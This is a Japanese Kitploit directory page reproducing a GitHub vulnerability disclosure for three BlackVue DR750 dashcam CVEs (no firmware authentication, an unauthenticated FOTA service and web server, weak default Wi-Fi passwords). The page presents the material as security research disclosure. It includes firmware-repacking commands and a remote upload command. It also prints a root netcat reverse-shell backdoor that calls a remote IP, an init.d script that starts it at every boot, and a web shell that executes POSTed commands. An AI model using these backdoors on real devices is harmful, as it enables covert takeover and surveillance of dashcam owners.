Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
blackvue-cve-2023 — BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748 | Kitploit
ツール/GitHubGitHub/eyjhb/blackvue-cve-2023
組み込みシステムセキュリティWi-Fi監査IoTセキュリティパスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ファームウェア解析
GitHubeyjhb/blackvue-cve-2023

blackvue-cve-2023

BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748

102142年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

BlackVue DR750 CVE(その他)

以下は教育目的のみのものであり、お持ちでないデバイスや使用許可のないデバイスで試さないでください。

執筆時点では、約300台の脆弱なBlackVueデバイスがオンラインで存在し、容易に発見・悪用可能ですが、公式パッチはまだリリースされていません。

BlackVueには2022年7月30日にこれらの脆弱性が通知され、調査するとの回答がありました。しかし、私たちが知る限り、何も行われていません。

デバイスへのバックドアの仕込み (CVE-2023-27748)

ファームウェア認証チェックなし

ファームウェアの真正性チェックがないため、悪意のある攻撃者がカスタムファームウェアをアップロードできます。このカスタムファームウェアには、バックドアやエクスプロイトを含めることができます。

再現手順:

  1. BlackVueのウェブサイトからファームウェアアーカイブをダウンロードする
  2. ファームウェアファイルが含まれる.zipを展開する
  3. イメージpatch_<dashcam_name>.binを展開する
  4. 必要なファイルを変更/追加する(バックドアの例を参照)
  5. イメージを再度tar.gzする
  6. 新しいpatch_<dashcam_name>.binのsueチェックサムを計算する(sue_checksumを参照)
root@kitploit:~
# https://blackvue.com/download/dr750-2ch-lte-firmware-multilanguage/ からダウンロード
$ unzip dr750-2ch-lte-v1.012-eng.zip
$ cd BlackVue/System/upgrade
$ mkdir patch-out
$ tar -C patch-out -xvzf patch_DR750LTE.bin
# patch-out 内で変更を行う
$ tar -C patch-out -czvf patch_DR750LTE.bin .
$ python3 sue_checksum.py patch_DR750LTE.bin patch_DR750LTE.bin.sue
$ cd ../../../

その後、BlackVueフォルダをドライブレコーダーのSDカードに配置するだけで、実行が開始されます。

FOTA(無線ファームウェアアップデート)用のファームウェアを作成する場合は、代わりにSystemディレクトリを.tgzファイルに圧縮します。

root@kitploit:~
$ tar -C BlackVue/System -czvf fwupgrade.tgz

このファイルは後でFOTAを使用してカスタムファームウェアをアップロードし、ドライブレコーダーを完全に侵害するために使用できます。

テスト中に、BlackVueのWebサイトから公式ファームウェアをデバイスに書き戻した場合でも、仕込まれたバックドアが持続することが確認された点に注意してください。

認証なしFOTA(ファームウェア無線アップデート)プロトコル

BlackVueドライブレコーダーはポート9771/TCPで待機し、FOTA(無線ファームウェアアップデート)サービスが動作しています。このサービスでは、ping、再起動、デバイス時刻の取得、ファームウェアのアップグレードなどが可能です。

このエンドポイントを保護するものは何もなく、ドライブレコーダーと同じLANに接続している場合、またはドライブレコーダーがLTEに接続している場合はインターネットからアクセス可能であり、重大なセキュリティリスクとなります。 FOTAサービスと通信できるPythonスクリプトはこちらにあります。

前のセクションの手順に基づいて新しいファームウェアを作成し、Pythonスクリプトを使用してアップロードします。

root@kitploit:~
python software/fota/fota.py 10.0.0.1 upgrade /tmp/fwupgrade.tgz

このユーティリティは動作を保証するものではありませんが、以前に一度動作した実績があります。

ファイアウォールなし

ドライブレコーダーにはファイアウォールが有効になっていません。これはWi-Fiのみで接続する場合は問題になりにくいですが、LTE版は直接インターネットに接続されます。一部のモバイルプロバイダーはファイアウォールを設定しておらず、ユーザーをNATの背後に配置しないためです。これは抽出したファームウェアを確認することで検証できます。

少なくともLTE搭載のBlackVueドライブレコーダーでは、LTE側の接続をブロックする必要があります。

安全でないデフォルトWi-Fiパスワード (CVE-2023-27746)

ドライブレコーダーのデフォルトWi-Fiパスワードは、小文字の英数字のみで長さ8文字です。ドライブレコーダーからのハンドシェイクを傍受し、Aircrack-ngのツールを使用してパスワードを計算することが可能です(ユーザーが変更していない場合)。これはレンタルハードウェア(約40ユーロ)を使用して約4日で実行できます。

認証なしWebサーバー (CVE-2023-27747)

デフォルトでは、Webサーバーは認証なしでアクセス可能であり、さまざまなエンドポイントを公開しています。

root@kitploit:~
├── blackvue_live.cgi
├── blackvue_livedata.cgi
├── blackvue_vod.cgi
├── Config
├── index.html
├── Record
└── upload.cgi

これらのエンドポイントにより、以下が可能になります。

  1. ドライブレコーダーのライブ映像
  2. ライブデータフィード(位置、速度など)
  3. ドライブレコーダーからすべての録画をダウンロード
  4. カスタム設定をドライブレコーダーにアップロード
  5. ドライブレコーダーから現在の設定をダウンロード 5.1. これには、復号可能なWi-Fi情報が含まれる可能性があります(上記参照)

SDカード上のWi-Fiパスワードの安全でない保存

ドライブレコーダーが接続するネットワークのWi-Fi SSIDとパスワードは、ドライブレコーダーのSDカードに保存されています。このデータは暗号化されていますが、アプリのリバースエンジニアリングによってキーは容易に明らかになります。これはwifi-decrypt.pyで実証されています。

また、ドライブレコーダーが接続するWi-Fiネットワークを変更する際、これらの値はBlackVueのサーバーに送信され、ドライブレコーダーに情報を送信できるようになるまで保存されることにも注意が必要です。このデータがドライブレコーダーが利用可能になった時点で削除されるかどうかは不明です。

これらの攻撃の組み合わせ

これらすべてを組み合わせると、特にLTEドライブレコーダーでは、簡単なRCEが実現可能です。

  1. バックドアを含むカスタムファームウェアを作成する
  2. fota.pyを使用してファームウェアをリモートでアップロードする
  3. バックドアに接続する
  4. ???
  5. 利益を得る

バックドアの例

カスタムファームウェアに含めることができるバックドアの例。

Netcat

以下のバックドアは、リモートマシンに接続し、rootとして完全なシェルアクセスを提供します。

/bin/backdoor.sh

root@kitploit:~
#!/bin/sh
IP=$1
PORT=$2

while /bin/true; do
    /usr/bin/nc $IP $PORT -e /bin/sh
done

以下のinit.dスクリプトは、起動時にバックドアを開始し、指定されたIP/ポートに接続します。 /etc/init.d/S85backdoor

root@kitploit:~
#!/bin/sh
/bin/backdoor 10.99.77.20 1745 &

cmd.cgi

以下のバックドアは、ペイロードがWebサーバーに送信されると、コマンドを(rootとして)実行できるようにします。

/res/System/www/cmd.cgi

root@kitploit:~
#!/bin/sh

echo "Content-type: text/html"    # 使用するデータタイプを設定
echo ""

POST_STRING=$(/bin/cat)
echo $POST_STRING
exec $POST_STRING
ツールをダウンロード